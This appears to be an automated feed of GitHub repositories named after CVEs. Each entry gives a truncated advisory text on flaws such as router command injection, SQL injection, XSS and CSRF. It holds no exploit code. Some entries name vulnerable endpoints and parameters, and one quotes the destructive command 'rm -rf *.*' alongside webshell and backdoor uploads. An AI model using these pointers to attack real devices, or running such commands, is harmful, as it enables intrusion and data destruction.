**A remote code execution vulnerability exists in Microsoft Outlook software when the software fails to properly handle objects in memory, aka 'Microsoft Outlook Remote Code Execution Vulnerability'. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16947](https://github.com/Live-Hack-CVE/CVE-2020-16947) create time: 2022-12-28T06:00:32Z

**A Race Condition Enabling Link Following vulnerability in the packaging of texlive-filesystem of SUSE Linux Enterprise Module for Desktop Applications 15-SP1, SUSE Linux Enterprise Software Development Kit 12-SP4, SUSE Linux Enterprise Software Development Kit 12-SP5; openSUSE Leap 15.1 allows local users to corrupt fi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8016](https://github.com/Live-Hack-CVE/CVE-2020-8016) create time: 2022-12-28T05:59:32Z

**Multiple buffer overflow vulnerabilities were found in the QUIC image decoding process of the SPICE remote display system, before spice-0.14.2-1. Both the SPICE client (spice-gtk) and server are affected by these flaws. These flaws allow a malicious client or server to send specially crafted messages that, when process CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14355](https://github.com/Live-Hack-CVE/CVE-2020-14355) create time: 2022-12-28T05:59:08Z

**Vulnerability in the Oracle FLEXCUBE Investor Servicing product of Oracle Financial Services Applications (component: Infrastructure). Supported versions that are affected are 12.1.0-12.4.0 and 14.0.0-14.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Ora CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2722](https://github.com/Live-Hack-CVE/CVE-2020-2722) create time: 2022-12-28T05:59:02Z

**A flaw was found in the Linux kernel's implementation of biovecs in versions before 5.9-rc7. A zero-length biovec request issued by the block subsystem could cause the kernel to enter an infinite loop, causing a denial of service. This flaw allows a local attacker with basic privileges to issue requests to a block devi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25641](https://github.com/Live-Hack-CVE/CVE-2020-25641) create time: 2022-12-28T05:58:12Z

**An exploitable signed comparison vulnerability exists in the ARMv7 memcpy() implementation of GNU glibc 2.30.9000. Calling memcpy() (on ARMv7 targets that utilize the GNU glibc implementation) with a negative value for the 'num' parameter results in a signed comparison vulnerability. If an attacker underflows the 'num' CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6096](https://github.com/Live-Hack-CVE/CVE-2020-6096) create time: 2022-12-28T05:57:51Z

**The Raccoon attack exploits a flaw in the TLS specification which can lead to an attacker being able to compute the pre-master secret in connections which have used a Diffie-Hellman (DH) based ciphersuite. In such a case this would result in the attacker being able to eavesdrop on all encrypted communications sent over CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-1968](https://github.com/Live-Hack-CVE/CVE-2020-1968) create time: 2022-12-28T05:56:23Z

**An issue was discovered in the MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 software in all versions through 2.5.0. There is an authenticated remote code execution in the backup-scheduler. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10382](https://github.com/Live-Hack-CVE/CVE-2020-10382) create time: 2022-12-28T05:25:24Z

**Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-17506](https://github.com/Live-Hack-CVE/CVE-2020-17506) create time: 2022-12-28T05:24:54Z

**A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-0920, CVE-2020-0929, CVE-2020-0931, CVE-2020-0932, CVE-2020-0974. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-0971](https://github.com/Live-Hack-CVE/CVE-2020-0971) create time: 2022-12-28T05:24:34Z

**etcd before versions 3.3.23 and 3.4.10 does not perform any password length validation, which allows for very short passwords, such as those with a length of one. This may allow an attacker to guess or brute-force users' passwords with little computational effort. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15115](https://github.com/Live-Hack-CVE/CVE-2020-15115) create time: 2022-12-28T05:24:13Z

**A CWE-732: Incorrect Permission Assignment for Critical Resource vulnerability exists that could allow remote code execution when an unprivileged user modifies a file. Affected Product: C-Bus Toolkit (V1.15.9 and prior) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22716](https://github.com/Live-Hack-CVE/CVE-2021-22716) create time: 2022-12-28T06:06:30Z

**A Incorrect Authorization vulnerability in SUSE Rancher allows administrators of third-party repositories to gather credentials that are sent to their servers. This issue affects: SUSE Rancher Rancher versions prior to 2.5.12; Rancher versions prior to 2.6.3. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36778](https://github.com/Live-Hack-CVE/CVE-2021-36778) create time: 2022-12-28T06:02:58Z

**A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escal CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3999](https://github.com/Live-Hack-CVE/CVE-2021-3999) create time: 2022-12-28T06:02:47Z

**rtw_wx_set_scan in drivers/staging/rtl8188eu/os_dep/ioctl_linux.c in the Linux kernel through 5.11.6 allows writing beyond the end of the ->ssid[] array. NOTE: from the perspective of kernel.org releases, CVE IDs are not normally used for drivers/staging/* (unfinished work); however, system integrators may have situati CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-28660](https://github.com/Live-Hack-CVE/CVE-2021-28660) create time: 2022-12-28T06:02:07Z

**Improper handling of length parameter inconsistency vulnerability in Mitsubishi Electric FA Engineering Software(CPU Module Logging Configuration Tool versions 1.112R and prior, CW Configurator versions 1.011M and prior, Data Transfer versions 3.44W and prior, EZSocket versions 5.4 and prior, FR Configurator all versio CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20588](https://github.com/Live-Hack-CVE/CVE-2021-20588) create time: 2022-12-28T06:01:18Z

**In Alpine before 2.25, untagged responses from an IMAP server are accepted before STARTTLS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38370](https://github.com/Live-Hack-CVE/CVE-2021-38370) create time: 2022-12-28T05:59:05Z

**A UNIX Symbolic Link (Symlink) Following vulnerability in the clone-master-clean-up.sh script of clone-master-clean-up in SUSE Linux Enterprise Server 12 SP3, SUSE Linux Enterprise Server 15 SP1; openSUSE Factory allows local attackers to delete arbitrary files. This issue affects: SUSE Linux Enterprise Server 12 SP3 c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32000](https://github.com/Live-Hack-CVE/CVE-2021-32000) create time: 2022-12-28T05:58:51Z

**Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33554](https://github.com/Live-Hack-CVE/CVE-2021-33554) create time: 2022-12-28T05:58:48Z

**Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33552](https://github.com/Live-Hack-CVE/CVE-2021-33552) create time: 2022-12-28T05:58:08Z

**Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33550](https://github.com/Live-Hack-CVE/CVE-2021-33550) create time: 2022-12-28T05:58:05Z

**Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33548](https://github.com/Live-Hack-CVE/CVE-2021-33548) create time: 2022-12-28T05:58:02Z

**Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33551](https://github.com/Live-Hack-CVE/CVE-2021-33551) create time: 2022-12-28T05:57:58Z

**Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33553](https://github.com/Live-Hack-CVE/CVE-2021-33553) create time: 2022-12-28T05:57:55Z

**Proofpoint Enterprise Protection before 18.8.0 allows a Bypass of a Security Control. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-31608](https://github.com/Live-Hack-CVE/CVE-2021-31608) create time: 2022-12-28T05:57:15Z

**File upload vulnerability in mingSoft MCMS through 5.2.5, allows remote attackers to execute arbitrary code via a crafted jspx webshell to net.mingsoft.basic.action.web.FileAction#upload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46386](https://github.com/Live-Hack-CVE/CVE-2021-46386) create time: 2022-12-28T05:57:12Z

**A buffer overflow in Synthesia before 10.7.5567, when a non-Latin locale is used, allows user-assisted attackers to cause a denial of service (application crash) via a crafted MIDI file with malformed bytes. This file is mishandled during a deletion attempt. In Synthesia before 10.9, an improper path handling allows lo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33897](https://github.com/Live-Hack-CVE/CVE-2021-33897) create time: 2022-12-28T05:55:47Z

**A flaw was found in postgresql in versions before 13.3, before 12.7, before 11.12, before 10.17 and before 9.6.22. While modifying certain SQL array values, missing bounds checks let authenticated database users write arbitrary bytes to a wide area of server memory. The highest threat from this vulnerability is to data CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32027](https://github.com/Live-Hack-CVE/CVE-2021-32027) create time: 2022-12-28T05:22:00Z

**Pillow through 8.2.0 and PIL (aka Python Imaging Library) through 1.1.7 allow an attacker to pass controlled parameters directly into a convert function to trigger a buffer overflow in Convert.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34552](https://github.com/Live-Hack-CVE/CVE-2021-34552) create time: 2022-12-28T05:21:57Z

**The package pillow 5.2.0 and before 8.3.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the getrgb function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23437](https://github.com/Live-Hack-CVE/CVE-2021-23437) create time: 2022-12-28T05:21:53Z

**A flaw was found in postgresql. Using an INSERT ... ON CONFLICT ... DO UPDATE command on a purpose-crafted table, an authenticated database user could read arbitrary bytes of server memory. The highest threat from this vulnerability is to data confidentiality. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32028](https://github.com/Live-Hack-CVE/CVE-2021-32028) create time: 2022-12-28T05:21:50Z

**A trivial sandbox (enabled with the `-dSAFER` option) escape flaw was found in the ghostscript interpreter by injecting a specially crafted pipe command. This flaw allows a specially crafted document to execute arbitrary commands on the system in the context of the ghostscript interpreter. The highest threat from this CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3781](https://github.com/Live-Hack-CVE/CVE-2021-3781) create time: 2022-12-28T05:21:10Z

**A flaw was found in postgresql. A purpose-crafted query can read arbitrary bytes of server memory. In the default configuration, any authenticated database user can complete this attack at will. The attack does not require the ability to create objects. If server settings include max_worker_processes=0, the known versi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3677](https://github.com/Live-Hack-CVE/CVE-2021-3677) create time: 2022-12-28T05:21:07Z

**A man-in-the-middle attacker can inject false responses to the client's first few queries, despite the use of SSL certificate verification and encryption. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23222](https://github.com/Live-Hack-CVE/CVE-2021-23222) create time: 2022-12-28T05:21:03Z

**When the server is configured to use trust authentication with a clientcert requirement or to use cert authentication, a man-in-the-middle attacker can inject arbitrary SQL queries when a connection is first established, despite the use of SSL certificate verification and encryption. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23214](https://github.com/Live-Hack-CVE/CVE-2021-23214) create time: 2022-12-28T05:21:00Z

**Multiple Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerabilities in Quiz And Survey Master plugin <= 7.3.4 on WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36905](https://github.com/Live-Hack-CVE/CVE-2021-36905) create time: 2022-12-28T05:20:00Z

**no description** : [nidhi7598/frameworks_minikin_AOSP_10_r33_CVE-2022-20472](https://github.com/nidhi7598/frameworks_minikin_AOSP_10_r33_CVE-2022-20472) create time: 2022-12-28T06:23:26Z

**Jenkins NS-ND Integration Performance Publisher Plugin 4.8.0.146 and earlier unconditionally disables SSL/TLS certificate and hostname validation for several features. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38666](https://github.com/Live-Hack-CVE/CVE-2022-38666) create time: 2022-12-28T06:06:57Z

**The Visualizations component of TIBCO Software Inc.'s TIBCO Spotfire Analyst, TIBCO Spotfire Analyst, TIBCO Spotfire Analyst, TIBCO Spotfire Analytics Platform for AWS Marketplace, TIBCO Spotfire Desktop, TIBCO Spotfire Desktop, TIBCO Spotfire Desktop, TIBCO Spotfire Server, TIBCO Spotfire Server, and TIBCO Spotfire Se CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41558](https://github.com/Live-Hack-CVE/CVE-2022-41558) create time: 2022-12-28T06:06:54Z

**In Tenda (Shenzhen Tenda Technology Co., Ltd) AC1200 Router model W15Ev2 V15.11.0.10(1576), a Stored Cross Site Scripting (XSS) issue exists allowing an attacker to execute JavaScript code via the applications website filtering tab, specifically the URL body. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40844](https://github.com/Live-Hack-CVE/CVE-2022-40844) create time: 2022-12-28T06:06:51Z

**In Tenda AC1200 Router model W15Ev2 V15.11.0.10(1576), there exists a command injection vulnerability in the function formSetFixTools. This vulnerability allows attackers to run arbitrary commands on the server via the hostname parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40847](https://github.com/Live-Hack-CVE/CVE-2022-40847) create time: 2022-12-28T06:06:48Z

**The Tenda AC1200 Router model W15Ev2 V15.11.0.10(1576) is affected by a password exposure vulnerability. When combined with the improper authorization/improper session management vulnerability, an attacker with access to the router may be able to expose sensitive information which they're not explicitly authorized to h CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40845](https://github.com/Live-Hack-CVE/CVE-2022-40845) create time: 2022-12-28T06:06:44Z

**Tenda AC1200 Router Model W15Ev2 V15.11.0.10(1576) was discovered to contain a command injection vulnerability via the PortMappingServer parameter in the setPortMapping function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42053](https://github.com/Live-Hack-CVE/CVE-2022-42053) create time: 2022-12-28T06:06:41Z

**In Tenda AC1200 Router model W15Ev2 V15.11.0.10(1576), a Stored Cross Site Scripting (XSS) vulnerability exists allowing an attacker to execute JavaScript code via the applications stored hostname. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40846](https://github.com/Live-Hack-CVE/CVE-2022-40846) create time: 2022-12-28T06:06:37Z

**KubeVela is an open source application delivery platform. Users using the VelaUX APIServer could be affected by this vulnerability. When using Helm Chart as the component delivery method, the request address of the warehouse is not restricted, and there is a blind SSRF vulnerability. Users who're using v1.6, please upd CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39383](https://github.com/Live-Hack-CVE/CVE-2022-39383) create time: 2022-12-28T06:06:34Z

**NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a local user with basic capabilities can cause a null-pointer dereference, which may lead to denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34666](https://github.com/Live-Hack-CVE/CVE-2022-34666) create time: 2022-12-28T06:06:27Z

**Jenkins CCCC Plugin 0.6 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45395](https://github.com/Live-Hack-CVE/CVE-2022-45395) create time: 2022-12-28T06:06:16Z

**Jenkins JAPEX Plugin 1.7 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45400](https://github.com/Live-Hack-CVE/CVE-2022-45400) create time: 2022-12-28T06:06:12Z

**Jenkins OSF Builder Suite : : XML Linter Plugin 1.0.2 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45397](https://github.com/Live-Hack-CVE/CVE-2022-45397) create time: 2022-12-28T06:06:08Z

**Jenkins SourceMonitor Plugin 0.2 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45396](https://github.com/Live-Hack-CVE/CVE-2022-45396) create time: 2022-12-28T06:06:05Z

**Automotive Shop Management System v1.0 is vulnerable to SQL Injection via /asms/admin/?page=transactions/manage_transaction&id=. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44820](https://github.com/Live-Hack-CVE/CVE-2022-44820) create time: 2022-12-28T06:06:01Z

**Automotive Shop Management System v1.0 is vulnerable to SQL Injection via /asms/admin/mechanics/view_mechanic.php?id=. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44415](https://github.com/Live-Hack-CVE/CVE-2022-44415) create time: 2022-12-28T06:05:57Z

**Automotive Shop Management System v1.0 is vulnerable to SQL Injection via /asms/admin/services/manage_service.php?id=. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44414](https://github.com/Live-Hack-CVE/CVE-2022-44414) create time: 2022-12-28T06:05:36Z

**Automotive Shop Management System v1.0 is vulnerable to SQL Injection via /asms/admin/mechanics/manage_mechanic.php?id=. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44413](https://github.com/Live-Hack-CVE/CVE-2022-44413) create time: 2022-12-28T06:05:33Z

**IBM InfoSphere DataStage 11.7 is vulnerable to a command injection vulnerability due to improper neutralization of special elements. IBM X-Force ID: 236687. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40752](https://github.com/Live-Hack-CVE/CVE-2022-40752) create time: 2022-12-28T06:05:29Z

**GNOME Nautilus 42.2 allows a NULL pointer dereference and get_basename application crash via a pasted ZIP archive. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37290](https://github.com/Live-Hack-CVE/CVE-2022-37290) create time: 2022-12-28T06:05:26Z

**An issue was discovered in BACKCLICK Professional 5.9.63. Due to insecure design or lack of authentication, unauthenticated attackers can complete the password-reset process for any account and set a new password. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44004](https://github.com/Live-Hack-CVE/CVE-2022-44004) create time: 2022-12-28T06:05:23Z

**An issue was discovered in BACKCLICK Professional 5.9.63. Due to insufficient escaping of user-supplied input, the application is vulnerable to SQL injection at various locations. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44003](https://github.com/Live-Hack-CVE/CVE-2022-44003) create time: 2022-12-28T06:05:19Z

**An issue was discovered in BACKCLICK Professional 5.9.63. Due to improper validation or sanitization of upload filenames, an externally reachable, unauthenticated update function permits writing files outside the intended target location. Achieving remote code execution is possible, e.g., by uploading an executable fil CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44006](https://github.com/Live-Hack-CVE/CVE-2022-44006) create time: 2022-12-28T06:05:16Z

**Auth. (subscriber+) Race Condition vulnerability in WP-Polls plugin <= 2.76.0 on WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40130](https://github.com/Live-Hack-CVE/CVE-2022-40130) create time: 2022-12-28T06:05:12Z

**Cross-Site Request Forgery (CSRF) vulnerability in Booster for WooCommerce plugin <= 5.6.6 on WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41805](https://github.com/Live-Hack-CVE/CVE-2022-41805) create time: 2022-12-28T06:05:09Z

**Cross-Site Request Forgery (CSRF) vulnerability in Creative Mail plugin <= 1.5.4 on WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40687](https://github.com/Live-Hack-CVE/CVE-2022-40687) create time: 2022-12-28T06:05:05Z

**Multiple Cross-Site Scripting (CSRF) vulnerabilities in SEO Redirection Plugin plugin <= 8.9 on WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40695](https://github.com/Live-Hack-CVE/CVE-2022-40695) create time: 2022-12-28T06:05:02Z

**Auth. (subscriber+) Server-Side Request Forgery (SSRF) vulnerability in Better Messages plugin 1.9.10.68 on WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41609](https://github.com/Live-Hack-CVE/CVE-2022-41609) create time: 2022-12-28T06:04:58Z

**Auth. (subscriber+) Cross-Site Scripting (XSS) vulnerability in Quiz And Survey Master plugin <= 7.3.10 on WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40698](https://github.com/Live-Hack-CVE/CVE-2022-40698) create time: 2022-12-28T06:04:55Z

**Automotive Shop Management System v1.0 is vulnerable to SQL Injection via /asms/classes/Master.php?f=delete_service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44379](https://github.com/Live-Hack-CVE/CVE-2022-44379) create time: 2022-12-28T06:04:51Z

**IBM DataPower Gateway 10.0.3.0 through 10.0.4.0, 10.0.1.0 through 10.0.1.9, 2018.4.1.0 through 2018.4.1.22, and 10.5.0.0 through 10.5.0.2 does not invalidate session after a password change which could allow an authenticated user to impersonate another user on the system. IBM X-Force ID: 235527. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40228](https://github.com/Live-Hack-CVE/CVE-2022-40228) create time: 2022-12-28T04:33:55Z

**WordPress users with lower privileges (like contributors) can inject JavaScript code in the block editor using a specific payload, which is executed within the dashboard. This can lead to XSS if an admin opens the post in the editor. Execution of this attack does require an authenticated user. This has been patched in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16780](https://github.com/Live-Hack-CVE/CVE-2019-16780) create time: 2022-12-28T04:36:57Z

**wp_kses_bad_protocol in wp-includes/kses.php in WordPress before 5.3.1 mishandles the HTML5 colon named entity, allowing attackers to bypass input sanitization, as demonstrated by the javascript&colon; substring. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20041](https://github.com/Live-Hack-CVE/CVE-2019-20041) create time: 2022-12-28T04:36:53Z

**Insufficient validation of environment variables in the telnet client supplied in Junos OS can lead to stack-based buffer overflows, which can be exploited to bypass veriexec restrictions on Junos OS. A stack-based overflow is present in the handling of environment variables when connecting via the telnet client to rem CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-0053](https://github.com/Live-Hack-CVE/CVE-2019-0053) create time: 2022-12-28T04:35:21Z

**Improper parameters handling in AMD Secure Processor (ASP) drivers may allow a privileged attacker to elevate their privileges potentially leading to loss of integrity. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12930](https://github.com/Live-Hack-CVE/CVE-2020-12930) create time: 2022-12-28T05:15:03Z

**Improper parameters handling in the AMD Secure Processor (ASP) kernel may allow a privileged attacker to elevate their privileges potentially leading to loss of integrity. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12931](https://github.com/Live-Hack-CVE/CVE-2020-12931) create time: 2022-12-28T05:14:56Z

**A vulnerability in the "/admin/wlmultipleap.asp" of optilink OP-XT71000N version: V2.2 could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to create Multiple WLAN BSSID. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-23582](https://github.com/Live-Hack-CVE/CVE-2020-23582) create time: 2022-12-28T04:39:47Z

**OPTILINK OP-XT71000N V2.2 is vulnerable to Remote Code Execution. The issue occurs when the attacker sends an arbitrary code on "/diag_ping_admin.asp" to "PingTest" interface that leads to COMMAND EXECUTION. An attacker can successfully trigger the COMMAND and can compromise full system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-23583](https://github.com/Live-Hack-CVE/CVE-2020-23583) create time: 2022-12-28T04:37:04Z

**A remote attacker can conduct a cross-site request forgery (CSRF) attack on OPTILINK OP-XT71000N Hardware Version: V2.2 , Firmware Version: OP_V3.3.1-191028. The vulnerability is due to insufficient CSRF protections for the "mgm_config_file.asp" because of which attacker can create a crafted "csrf form" which sends " m CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-23585](https://github.com/Live-Hack-CVE/CVE-2020-23585) create time: 2022-12-28T04:37:01Z

**A vulnerability in OPTILINK OP-XT71000N Hardware Version: V2.2, Firmware Version: OP_V3.3.1-191028 allows an unauthenticated, remote attacker to conduct a cross site request forgery (CSRF) attack to enable syslog mode through ' /mgm_log_cfg.asp.' The system starts to log events, 'Remote' mode or 'Both' mode on "Syslog CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-23593](https://github.com/Live-Hack-CVE/CVE-2020-23593) create time: 2022-12-28T04:36:50Z

**Unauthenticated remote code execution in OPTILINK OP-XT71000N, Hardware Version: V2.2 occurs when the attacker passes arbitrary commands with IP-ADDRESS using " | " to execute commands on " /diag_tracert_admin.asp " in the "PingTest" parameter that leads to command execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-23584](https://github.com/Live-Hack-CVE/CVE-2020-23584) create time: 2022-12-28T04:36:47Z

**A vulnerability found in OPTILINK OP-XT71000N Hardware Version: V2.2 , Firmware Version: OP_V3.3.1-191028 allows an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to Add Network Traffic Control Type Rule. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-23586](https://github.com/Live-Hack-CVE/CVE-2020-23586) create time: 2022-12-28T04:36:43Z

**A vulnerability found in the OPTILINK OP-XT71000N Hardware Version: V2.2 , Firmware Version: OP_V3.3.1-191028 allows an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to men in the middle attack by adding New Routes in RoutingConfiguration on " /routing.asp ". CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-23587](https://github.com/Live-Hack-CVE/CVE-2020-23587) create time: 2022-12-28T04:36:40Z

**A vulnerability in OPTILINK OP-XT71000N Hardware Version: V2.2 , Firmware Version: OP_V3.3.1-191028 allows an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to "Enable or Disable Ports" and to "Change port number" through " /rmtacc.asp ". CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-23588](https://github.com/Live-Hack-CVE/CVE-2020-23588) create time: 2022-12-28T04:36:37Z

**A vulnerability in OPTILINK OP-XT71000N Hardware Version: V2.2 , Firmware Version: OP_V3.3.1-191028 allows an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to cause a Denial of Service by Rebooting the router through " /mgm_dev_reboot.asp." CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-23589](https://github.com/Live-Hack-CVE/CVE-2020-23589) create time: 2022-12-28T04:36:33Z

**A vulnerability in Optilink OP-XT71000N Hardware version: V2.2 , Firmware Version: OP_V3.3.1-191028 allows an unauthenticated remote attacker to conduct a cross-site request forgery (CSRF) attack to change the Password for "WLAN SSID" through "wlwpa.asp". CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-23590](https://github.com/Live-Hack-CVE/CVE-2020-23590) create time: 2022-12-28T04:36:30Z

**A vulnerability in OPTILINK OP-XT71000N Hardware Version: V2.2 , Firmware Version: OP_V3.3.1-191028 allows an attacker to upload arbitrary files through " /mgm_dev_upgrade.asp " which can "delete every file for Denial of Service (using 'rm -rf *.*' in the code), reverse connection (using '.asp' webshell), backdoor. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-23591](https://github.com/Live-Hack-CVE/CVE-2020-23591) create time: 2022-12-28T04:36:26Z

**A vulnerability in OPTILINK OP-XT71000N Hardware Version: V2.2 , Firmware Version: OP_V3.3.1-191028 allows an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to Reset ONU to Factory Default through ' /mgm_dev_reset.asp.' Resetting to default leads to Escalation of Privileges by lo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-23592](https://github.com/Live-Hack-CVE/CVE-2020-23592) create time: 2022-12-28T04:36:03Z

**** DISPUTED ** svm_predict_values in svm.cpp in Libsvm v324, as used in scikit-learn 0.23.2 and other products, allows attackers to cause a denial of service (segmentation fault) via a crafted model SVM (introduced via pickle, json, or any other model permanence standard) with a large value in the _n_support array. NOT CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28975](https://github.com/Live-Hack-CVE/CVE-2020-28975) create time: 2022-12-28T04:35:17Z

**It was discovered that Kibana was not sanitizing document fields containing HTML snippets. Using this vulnerability, an attacker with the ability to write documents to an elasticsearch index could inject HTML. When the Discover app highlighted a search term containing the HTML, it would be rendered for the user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37936](https://github.com/Live-Hack-CVE/CVE-2021-37936) create time: 2022-12-28T05:17:11Z

**The SEPPmail solution is vulnerable to a Cross-Site Scripting vulnerability (XSS), because user input is not correctly encoded in HTML attributes when returned by the server.SEPPmail 11.1.10 allows XSS via a recipient address. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-31739](https://github.com/Live-Hack-CVE/CVE-2021-31739) create time: 2022-12-28T05:16:57Z

